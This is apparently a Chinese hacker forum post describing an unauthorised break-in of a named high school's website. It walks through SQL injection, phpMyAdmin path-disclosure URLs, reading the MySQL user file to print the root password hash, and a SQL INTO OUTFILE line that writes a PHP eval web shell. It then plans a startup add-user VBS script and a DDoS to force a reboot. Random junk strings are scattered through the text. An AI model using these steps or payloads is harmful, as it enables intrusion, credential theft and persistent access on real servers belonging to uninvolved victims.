友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
4 J9 Z. ^$ r* ?5 H; [1 ?; f发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
# T: G. B9 ]7 s- {

# x0 C& i5 L5 A4 ]. A
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
3 W. M* J7 F' x
8 o) F* C0 f+ P+ W5 {% J8 |/ M那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

7 }$ q4 Q; O, b6 x1 A试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
. Q8 \6 Z: f8 }6 C9 ]' S2./phpMyAdmin/phpinfo.php  
& H: ^$ i  t7 H- c4 y3 z# p  Q3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
- J" Z9 _2 R$ P& c' W6./phpmyadmin/libraries/lect_lang.lib.php  
) V1 H5 O5 V. h0 l4 l5 n7./phpmyadmin/libraries/mcrypt.lib.php   
, R9 k' M! d9 |" d. i" C3 b8./phpmyadmin/libraries/export/xls.php  

% i6 g. I* S( j4 Z, Y- H. n均不行...........................
. }- n1 n* |7 U5 r1 E0 a4 f
/ w) D- k, K! A% ?7 v6 p* I御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
8 ~8 p. v; i5 U& M9 ~) W; V
5 q  k7 `* z  b2 T权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
$ D, f0 y5 u4 k5 Q# Q* b$ k: Z
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
$ U7 U5 s  K% q5 _4 e0 o
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
2 @2 `2 b! ~3 b% G* ?4 j2 v
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

! y0 l6 V& f$ M: |17---- r(0072)
- J8 a# p2 x; N$ I2 J3 e18---- o(006f)
2 P6 B8 \: z- R! F% t& I# @19---- o(006f)
# k+ T& ]2 H4 M" P0 k5 f4 d7 t20---- t(0074)
* x/ U2 ?3 [' d) v2 t: J21---- *(002a)
22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
27---- 5(0035)
28---- 8(0038)
$ v- l( Y; p# f. ]/ Q$ m8 n29---- 2(0032)
* O# u; q6 U# `) H: p3 X30---- 8(0038)
31---- A(0041)
7 J" c1 Z& t2 i0 y32---- 9(0039)
33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
  ^$ p! Y: l) @1 O# ^41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
% [8 t- H: \0 }1 {) I% Z, d" v( G44---- 5(0035)
5 T! u$ i( {$ N  P* }" z45---- 9(0039)
46---- 8(0038)
; ?( u* M2 a- E' G( r47---- F(0046)
1 C  a9 Z" J) Q+ K48---- F(0046)
; ~+ F8 P: @" w3 A7 f9 N2 w49---- 4(0034)
- w* v+ F" R+ _* w0 q50---- F(0046)
51---- 0(0030)
" n6 b! `1 n. C" h; Q* k' U  `( c52---- 3(0033)
# Z9 P5 N# F$ l3 y53---- 2(0032)
54---- A(0041)
8 E1 s! r5 l1 f2 R. j& n# S55---- 4(0034)
7 t6 q, }1 l. ]( u56---- A(0041)
57---- B(0042)
58---- *(0044)
! m2 T0 M. L5 K: k: a( E2 ?59---- *(0035)
8 i# Q8 N# X2 a  k) h1 B1 G60---- *(0041)
2 h7 j/ l: P- S61---- *0032)

0 N2 X' ~$ [2 V5 X解密后成功登陆phpmyamin
9 E: ?4 n. y; Z2 G7 @                          

$ v1 ]# P4 g$ E0 ~                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
3 y/ z- H6 C/ u& P; }
成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
/ J% ]! w8 J, J/ A/ [7 V
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

0 L% B2 Z. `; ]* D+ }$ l4 f  b

-------------------------------------------------------------------------------
6 L; @, d- i2 }* O+ O. j/ Zadmin
/ M  L6 o) O5 t$ q, a2 I6 D3 ?Administrator
slipper$
sqluser
7 y) n8 d3 `  B5 t* C, v命令成功完成。
8 m* F* b8 D% U- B* }' Y
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
/ v+ s7 M  U, k% G% X
ddos服务器重启，不然就只能坐等服务器重启了...............................

" r1 O' n/ T2 r- A5 A# }  ]" o      

" S+ o5 Z3 S9 ~1 d4 c; ]8 [2 C

angel